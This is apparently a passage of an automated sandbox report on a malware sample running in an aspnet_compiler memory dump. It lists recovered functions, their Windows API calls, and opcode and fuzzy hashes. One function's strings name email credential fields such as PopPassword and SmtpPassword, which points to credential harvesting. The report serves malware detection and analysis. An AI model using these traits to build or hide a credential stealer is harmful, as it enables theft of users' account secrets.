                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileMove
                                • String ID:
                                • API String ID: 3562171763-0
                                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Startup
                                • String ID:
                                • API String ID: 724789610-0
                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID:
                                • API String ID: 1174141254-0
                                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocket
                                • String ID:
                                • API String ID: 2781271927-0
                                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-0
                                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

                                Non-executed Functions

                                Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                Download Yara Rule
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                • VariantInit.OLEAUT32(?), ref: 00404414
                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                • VariantInit.OLEAUT32(?), ref: 00404431
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                • String ID:
                                • API String ID: 1312198159-0
                                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                • API String ID: 0-2111798378
                                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                Function 0040317B Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64